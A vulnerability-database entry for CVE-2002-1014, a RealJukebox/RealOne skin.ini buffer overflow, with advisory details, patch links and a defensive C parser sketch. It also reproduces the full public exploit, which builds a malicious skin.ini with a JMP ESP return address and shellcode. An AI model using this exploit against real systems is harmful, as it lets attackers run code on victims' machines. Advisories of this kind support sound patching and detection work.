CVE-2002-1014
CVSS 7.5
Published: 2002-10-04 00:00:00
Revised: 2008-09-05 16:29:32
NMCOE    

[Original] Buffer overflow in RealJukebox 2 1.0.2.340 and 1.0.2.379, and RealOne Player Gold 6.0.10.505, allows remote attackers to execute arbitrary code via an RFS skin file whose skin.ini contains a long value in a CONTROLnImage argument, such as CONTROL1Image.


[CNNVD] Real Networks RealJukebox/RealOne Player Gold Skin File Remote Buffer Overflow Vulnerability (CNNVD-200210-154)

RealJukebox/Real Player Gold is a feature-rich media player developed by Real Networks that supports replaceable skins.
RealJukebox/Real Player Gold lacks proper buffer boundary checks when handling the "CONTROLnImage" field of the skin.ini file; a remote attacker can exploit this to carry out a buffer overflow attack.
RealJukebox/Real Player Gold does not sufficiently check the "CONTROLnImage" field in "skin.ini". An attacker can place an overly long filename in a skin.ini file as the "CONTROLnImage" field data; when a RealJukebox/Real Player Gold user processes this malicious skin.ini file, a buffer overflow occurs, and carefully crafted "CONTROLnImage" field data can lead to execution of arbitrary instructions on the system with the privileges of the RealJukebox/Real Player Gold process.

- CVSS (base score)

CVSS score: 7.5 [HIGH]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: PARTIAL [may cause performance degradation or interrupt access to resources]
Attack complexity: LOW [exploitation has no access restrictions]
Attack vector: [--]
Authentication: NONE [exploitation requires no authentication]

- CPE (affected platforms and products)

cpe:/a:realnetworks:realone_player:6.0.10.505:gold
cpe:/a:realnetworks:realjukebox_2_plus:1.0.2.379
cpe:/a:realnetworks:realjukebox_2:1.0.2.379
cpe:/a:realnetworks:realjukebox_2:1.0.2.340
cpe:/a:realnetworks:realjukebox_2_plus:1.0.2.340

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1014
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-1014
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200210-154
(official data source) CNNVD

- Other links and resources

http://www.kb.cert.org/vuls/id/843667
(UNKNOWN)  CERT-VN  VU#843667
http://www.securityfocus.com/bid/5217
(VENDOR_ADVISORY)  BID  5217
http://www.iss.net/security_center/static/9538.php
(VENDOR_ADVISORY)  XF  realplayer-rjs-controlnimage-bo(9538)
http://service.real.com/help/faq/security/bufferoverrun07092002.html
(UNKNOWN)  CONFIRM  http://service.real.com/help/faq/security/bufferoverrun07092002.html
http://archives.neohapsis.com/archives/bugtraq/2002-07/0127.html
(UNKNOWN)  BUGTRAQ  20020712 [SPSadvisory#48]RealONE Player Gold / RealJukebox2 Buffer Overflow

- Vulnerability information

Real Networks RealJukebox/RealOne Player Gold Skin File Remote Buffer Overflow Vulnerability
High risk  Unknown
2002-10-04 00:00:00 2006-01-05 00:00:00
Remote

- Advisories and patches

Temporary workaround:
If you cannot install the patch or upgrade immediately, CNNVD recommends the following measures to reduce the threat:
* No suitable temporary workaround is available at this time.
Vendor patch:
Real Networks
-------------
The vendor has released upgrade patches to fix this security issue; please download them from the vendor's homepage:
Real Networks RealJukebox 2 for Windows 1.0.2.379:
Real Networks Patch skinpfree2.rmp

http://www.service.real.com/help/faq/security/07092002/skinpfree2.rmp

Real Networks RealJukebox 2 Plus for Windows 1.0.2.379:
Real Networks Patch skinpplus2.rmp

http://www.service.real.com/help/faq/security/07092002/skinpplus2.rmp

Real Networks RealJukebox 2 Plus for Windows 1.0.2.340:
Real Networks Patch skinpplus1.rmp

http://www.service.real.com/help/faq/security/07092002/skinpplus1.rmp

Real Networks RealJukebox 2 for Windows 1.0.2.340:
Real Networks Patch skinpfree1.rmp

http://www.service.real.com/help/faq/security/07092002/skinpfree1.rmp

Real Networks RealOne Player Gold for Windows 6.0.10.505:
Real Networks Patch skinpatchr11s.rmp

http://www.service.real.com/help/faq/security/07092002/skinpatchr11s.rmp

- Vulnerability information (21615)

Real Networks RealJukebox 1.0.2/RealOne 6.0.10 Player Gold Skinfile Buffer Overflow (EDBID:21615)
windows remote
2002-07-12 Verified
0 UNYUN
N/A
source: http://www.securityfocus.com/bid/5217/info

Real Software has announced a vulnerability in RealJukebox2 and Real Player Gold.

A buffer overflow condition exists due to insufficient bounds checking of fields in skinfiles. There is an unchecked buffer for the "CONTROLnImage" field of the "skin.ini" file. By supplying an overly long filename as a value for this field, it is possible to overwrite stack variables. An attacker may exploit this condition to overwrite the return address with a pointer to embedded attacker-supplied instructions.

To exploit this issue the attacker must transmit the maliciously constructed skinfile to a victim of the attack. This may be done via a webpage or HTML e-mail. Exploitation of this issue may result in execution of attacker-supplied instructions with the privileges of the user opening the malicious skinfile. 
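The defect described above is a missing length check on a single INI value. As an added illustration, not code from the original advisory, the exploit author, or RealNetworks, the following C sketch shows the bounded handling a skin.ini parser needs: `parse_control_image` only copies a `CONTROLnImage` value into a fixed-size buffer when it fits, and `count_oversized_control_images` scans a whole skin.ini and counts values longer than a limit, which is the kind of check a file-triage or mail-gateway filter could apply to RFS skin files. The limit `IMAGE_PATH_MAX` (260 bytes, the Windows `MAX_PATH`) is an assumed ceiling for a legitimate image path; the sample INI text is constructed for the example.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>
#include <stddef.h>

/* Assumed limit: a legitimate image path fits in a Windows MAX_PATH buffer. */
#define IMAGE_PATH_MAX 260

enum skin_result { SKIN_OK = 0, SKIN_NOT_CONTROL_IMAGE = 1, SKIN_VALUE_TOO_LONG = 2 };

/* Returns 1 if key[0..keylen) has the shape CONTROL<digits>Image, else 0. */
static int is_control_image_key(const char *key, size_t keylen)
{
    const char *prefix = "CONTROL", *suffix = "Image";
    size_t plen = strlen(prefix), slen = strlen(suffix);
    if (keylen < plen + slen + 1) return 0;                      /* need at least one digit */
    if (strncmp(key, prefix, plen) != 0) return 0;
    if (strncmp(key + keylen - slen, suffix, slen) != 0) return 0;
    for (size_t i = plen; i < keylen - slen; i++)
        if (!isdigit((unsigned char)key[i])) return 0;
    return 1;
}

/* Hardened handling of one "key=value" line: the value is copied into out
 * only if it fits with its terminator; anything longer is rejected, never truncated
 * silently and never written past the buffer. */
enum skin_result parse_control_image(const char *line, char *out, size_t outsz)
{
    const char *eq = strchr(line, '=');
    if (eq == NULL || !is_control_image_key(line, (size_t)(eq - line)))
        return SKIN_NOT_CONTROL_IMAGE;
    const char *val = eq + 1;
    size_t vlen = strcspn(val, "\r\n");                           /* value ends at end of line */
    if (vlen >= outsz) { out[0] = '\0'; return SKIN_VALUE_TOO_LONG; }
    memcpy(out, val, vlen);
    out[vlen] = '\0';
    return SKIN_OK;
}

/* Triage helper: count CONTROLnImage values longer than `limit` in a whole skin.ini text. */
int count_oversized_control_images(const char *ini, size_t limit)
{
    int bad = 0;
    const char *p = ini;
    while (*p) {
        const char *eol = p + strcspn(p, "\n");
        const char *eq = memchr(p, '=', (size_t)(eol - p));
        if (eq && is_control_image_key(p, (size_t)(eq - p))) {
            size_t vlen = (size_t)(eol - (eq + 1));
            if (vlen > 0 && eol[-1] == '\r') vlen--;             /* tolerate CRLF files */
            if (vlen > limit) bad++;
        }
        p = (*eol == '\n') ? eol + 1 : eol;
    }
    return bad;
}

/* Constructed sample: one benign entry and one 300-byte CONTROL2Image value. */
static int build_sample_ini(char *buf, size_t sz)
{
    int n = snprintf(buf, sz, "[MAIN]\nApplication=RealJukebox\nVersion=2\n"
                              "CONTROL1Image=images/play.bmp\nCONTROL2Image=");
    if (n < 0 || (size_t)n + 300 + 2 > sz) return -1;
    memset(buf + n, 'A', 300);
    buf[n + 300] = '\n';
    buf[n + 301] = '\0';
    return 0;
}

int demo_parse_ok(void)
{
    char out[IMAGE_PATH_MAX + 1];
    return parse_control_image("CONTROL1Image=images/play.bmp\r\n", out, sizeof out) == SKIN_OK
        && strcmp(out, "images/play.bmp") == 0;
}

int demo_parse_rejects_long(void)
{
    char line[400], out[IMAGE_PATH_MAX + 1];
    strcpy(line, "CONTROL1Image=");
    memset(line + 14, 'A', 300);
    line[314] = '\n';
    line[315] = '\0';
    return parse_control_image(line, out, sizeof out) == SKIN_VALUE_TOO_LONG;
}

int demo_oversized_count(void)
{
    char ini[1024];
    if (build_sample_ini(ini, sizeof ini) != 0) return -1;
    return count_oversized_control_images(ini, IMAGE_PATH_MAX);   /* 1 for the sample */
}

int main(void)
{
    printf("benign line parsed: %d\n", demo_parse_ok());
    printf("oversized line rejected: %d\n", demo_parse_rejects_long());
    printf("oversized entries in sample skin.ini: %d\n", demo_oversized_count());
    return 0;
}
```

The point of the split into two functions is that the same key-shape test serves both the consumer (bounded copy at parse time) and the gate in front of it (rejecting a file before any player ever opens it); a fixed limit on the value rather than on the whole file is what matters, since the original flaw is per-field.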

/*===========================================================
   RealJukebox2 1.0.2.379 Exploit
     for Windows Windows2000 Professional (Service Pack 2)
   The Shadow Penguin Security (http://www.shadowpenguin.org)
   Written by UNYUN (unyun@shadowpenguin.org)
  ============================================================
*/

#include <stdio.h>
#include <stdlib.h>     /* exit() */
#include <string.h>     /* memset(), strncpy(), strlen() */
#include <windows.h>

#define MAXBUF          4096
#define KERNEL_NAME     "kernel32.dll"
#define SKIN_INI        "skin.ini"
#define INI_FILE \
"[MAIN]\n"\
"Application=RealJukebox\n"\
"Version=2\n"\
"SkinFamilyCount=5\n"\
"\n"\
"CONTROL1Image=%s\n"

#define NOP             0x90
#define FAKE_OFS1       36
#define FAKE_VAL1       0x7FFDF0F0
#define RETADR_OFS      28
#define CODE_OFS        60
#define RETADR_2000pro  0x77e0af64

static unsigned char egg_2000pro[512]={
  0xB8,0xA5,0xFA,0xE1,0x77,0x33,0xDB,0xB3,
  0x04,0x53,0x53,0xFF,0xD0,0x90,0xEB,0xFD,
  0x00
};

unsigned int search_mem(unsigned char *st,unsigned char *ed,
                unsigned char c1,unsigned char c2)
{
    unsigned char   *p;
    unsigned int    adr;

    for (p=st;p<ed;p++)
        if (*p==c1 && *(p+1)==c2){
            adr=(unsigned int)p;
            if ((adr&0xff)==0) continue;
            if (((adr>>8)&0xff)==0) continue;
            if (((adr>>16)&0xff)==0) continue;
            if (((adr>>24)&0xff)==0) continue;
            return(adr);
        }
    return(0);
}

void valset(char *buf,unsigned int val)
{
    buf[0]=val&0xff;
    buf[1]=(val>>8)&0xff;
    buf[2]=(val>>16)&0xff;
    buf[3]=(val>>24)&0xff;
}

int main(int argc,char *argv[])
{
    FILE            *fp;
    char            buf[MAXBUF];
    unsigned int    tgt,exw;
    unsigned char   *kp;

    if ((fp=fopen(SKIN_INI,"wb"))==NULL){
        printf("Can not write file.\n");
        exit(1);
    }
    memset(buf,NOP,sizeof(buf));
    buf[sizeof(buf)-1]='\0';

    if ((kp=(unsigned char *)LoadLibrary(KERNEL_NAME))==NULL){
        printf("Can not find %s\n",KERNEL_NAME);
        exit(1);
    }
    tgt=search_mem(kp,kp+0x100000,0xff,0xe4);
    if (tgt==0) tgt=RETADR_2000pro;
    printf("kp            = 0x%x\n",(unsigned int)kp);
    printf("JMP ESP addr  = 0x%x\n",tgt);
    exw=(unsigned int)ExitWindowsEx;
    printf("ExitWindowsEx = 0x%x\n",exw);

    valset(buf+FAKE_OFS1,FAKE_VAL1);
    valset(buf+RETADR_OFS,tgt);
    valset(egg_2000pro+1,exw);
    strncpy(buf+CODE_OFS,(char *)egg_2000pro,strlen((char *)egg_2000pro));

    fprintf(fp,INI_FILE,buf);
    fclose(fp);
    printf("Created '%s'.\n",SKIN_INI);
    return(0);
}

- Vulnerability information

5036
RealJukebox/RealOne RFS skin.ini CONTROL1Image Handling Overflow
Context Dependent Input Manipulation
Loss of Integrity
Exploit Public

- Vulnerability description

- Timeline

2004-04-09 Unknown
2004-04-09 Unknown

- Solution

Products

Unknown or Incomplete

- Related references

- Vulnerability author

Unknown or Incomplete